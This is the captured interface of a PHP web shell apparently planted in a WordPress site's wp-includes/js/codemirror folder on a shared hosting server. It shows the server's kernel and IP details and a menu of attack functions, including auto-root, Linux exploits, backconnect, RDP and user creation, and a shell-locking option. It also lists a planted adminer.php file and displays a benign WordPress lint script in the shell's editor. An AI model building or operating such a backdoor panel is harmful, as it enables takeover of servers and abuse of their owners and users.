Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-includes /
js /
codemirror /
[ HOME SHELL ]
Name
Size
Permission
Action
adminer.php
0
B
-rw-r--r--
codemirror.min.css
16.1
KB
-rw-r--r--
codemirror.min.js
605.62
KB
-rw-r--r--
csslint.js
365.24
KB
-rw-r--r--
espree.min.js
248.2
KB
-rw-r--r--
esprima.js
276.92
KB
-rw-r--r--
fakejshint.js
1.25
KB
-rw-r--r--
htmlhint-kses.js
1.19
KB
-rw-r--r--
htmlhint.js
40.99
KB
-rw-r--r--
jsonlint.js
8.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : htmlhint-kses.js
/* global HTMLHint */ /* eslint no-magic-numbers: ["error", { "ignore": [1] }] */ HTMLHint.addRule( { id: 'kses', description: 'Element or attribute cannot be used.', /** * Initialize. * * @this {import('htmlhint/types').Rule} * @param {import('htmlhint').HTMLParser} parser - Parser. * @param {import('htmlhint').Reporter} reporter - Reporter. * @param {Record<string, Record<string, boolean>>} options - KSES options. * @return {void} */ init: function ( parser, reporter, options ) { 'use strict'; parser.addListener( 'tagstart', ( event ) => { const tagName = event.tagName.toLowerCase(); if ( ! options[ tagName ] ) { reporter.error( `Tag <${ event.tagName }> is not allowed.`, event.line, event.col, this, event.raw ); return; } const allowedAttributes = options[ tagName ]; const column = event.col + event.tagName.length + 1; for ( const attribute of event.attrs ) { if ( ! allowedAttributes[ attribute.name.toLowerCase() ] ) { reporter.error( `Tag attribute [${ attribute.raw }] is not allowed.`, event.line, column + attribute.index, this, attribute.raw ); } } } ); }, } );
Close